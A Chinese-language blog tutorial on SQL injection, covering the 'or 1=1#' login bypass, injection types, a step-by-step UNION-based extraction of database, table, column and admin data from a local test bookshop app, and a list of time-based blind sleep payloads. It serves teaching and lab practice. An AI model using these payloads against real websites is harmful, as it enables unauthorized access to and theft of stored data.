温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

SQL注入的原理介绍

发布时间:2021-09-17 20:39:54 来源:亿速云 阅读:201 作者:chen 栏目:网络管理

这篇文章主要讲解了“SQL注入的原理介绍”,文中的讲解内容简单清晰,易于学习与理解,下面请大家跟着小编的思路慢慢深入,一起来研究和学习“SQL注入的原理介绍”吧!

原理介绍

当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库进行执行,获取或修改数据库中的数据。

SQL注入漏洞有两个关键条件:

  • 用户能控制输入的内容

  • web应用把用户输入的内容带入到数据库中执行

接下来将用自己本地搭建的环境来演示SQL注入。。。。

别想了,我怎么可能把真实网站的注入过程写在博客上,不想请喝茶

一、万能密码

打开网站的登陆界面,我们没有密码是无法登陆的但是由于网站开发者在开发网站时没有对登陆进行过滤,导致存在万能密码漏洞

SQL注入的原理介绍

输入万能密码 root ‘ or 1 = 1#

SQL注入的原理介绍

点击登陆,就会提示我们登陆成功!

SQL注入的原理介绍

看,我们已经登陆进来了!

SQL注入的原理介绍

原理

登陆语句是这样的:

SELECT * FROM admin WHERE Username=’root’ and Password =’pass’

查询admi表里所有Username =我们输入的Username 并且Password =我们输入的Password的结果

只要结果不为空就为真,也就是登陆成功

我们输入万能密码root ‘ or 1 = 1# 构造

SELECT * FROM admin WHERE Username=’root ‘ or 1 = 1#’and Password =’pass’

通过注释符号#注释掉and Password =’pass,在root’ or 1=1 的基础上使结果为真成立。

SQL注入

SQL注入分类

SQL注入,从代码角度来看:

分为数字型和字符型,又根据字符型和数字型可以外加()和字符型能使用双引号和单引号

分为以下几种:

1、selent * from users where id=1纯数字

2、selent * from users where id=’1’只加单引号

3、selent * from users where id=”1”只加双引号

4、selent * from users where (id=1)数字加括号

5、selent * from users where (id=’1’)数字加单引号

6、selent * from users where (id=”1”)数字加双引号

如果写的不够清晰,我们可以用一张图来解释

SQL注入的原理介绍

实例演示

打开搭建好的环境,点击打开一个页面来测试有没有SQL注入

SQL注入的原理介绍

http://127.0.0.1/bookshop/show_pro.php

?id=55’ 出现问题,可能存在注入

SQL注入的原理介绍

http://127.0.0.1/bookshop/show_pro.php

?id=55’ %23 加%23后恢复正常,可以判断为’1’注入

SQL注入的原理介绍

http://127.0.0.1/bookshop/show_pro.php

?id=55’ order by 1 %23 使用order by 1 2 3 4 进行测试,发现查询的结果为12列,再这里我只显示结尾截图,方便后续使用union select

SQL注入的原理介绍

http://127.0.0.1/bookshop/show_pro.php

?id=55’ union select 1,2,3,4,5,6,7,8,9,10,11,12 %23 发现页面不显示union select的内容,尝试使用limit或者是将前边的内容改为空

SQL注入的原理介绍

http://127.0.0.1/bookshop/show_pro.php

?id=55’ union select 1,2,3 limit 1,1 %23

http://127.0.0.1/bookshop/show_pro.php

?id=55’ union select 1,2,3 %23 可以显示union select后的内容,8是显示结果的地方

SQL注入的原理介绍

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,user(),9,10,11,12 %23 把8位改为user()和database()发现可以显示用户和数据库

SQL注入的原理介绍

SQL注入的原理介绍

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,(select group_concat(schema_name) from information_schema.SCHEMATA),9,10,11,12 %23

查询所有的库名字

SQL注入的原理介绍

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,(select group_concat(table_name) from information_schema.TABLES where table_schema = ‘test’),9,10,11,12 %23

查询出test库中所有的表名

SQL注入的原理介绍

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,(select group_concat(column_name) from information_schema.COLUMNS where table_schema = ‘test’ and table_name = ‘admin’),9,10,11,12 %23 查询处test库中admin表所有的字段名字

SQL注入的原理介绍

http://127.0.0.1/bookshop/show_pro.php

?id=-55’union select 1,2,3,4,5,6,7,(select group_concat(news) from test.admin ),9,10,11,12 %23

查询security库中users表中的数据,由于这个表中没有数据所以不会有显示,但在真实环境中是会看到内容的

SQL注入的原理介绍

延时盲注

延时盲注会有以下几种情况,暂不做演示

1’ and sleep(5) %23

1’) and sleep(5) %23

1’)) and sleep(5) %23

1 and sleep(5) %23

1) and sleep(5) %23

1)) and sleep(5) %23

1” and sleep(5) %23

1”) and sleep(5) %23

1”)) and sleep(5) %23

感谢各位的阅读,以上就是“SQL注入的原理介绍”的内容了,经过本文的学习后,相信大家对SQL注入的原理介绍这一问题有了更深刻的体会,具体使用情况还需要大家实践验证。这里是亿速云,小编将为大家推送更多相关知识点的文章,欢迎关注!

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

sql
AI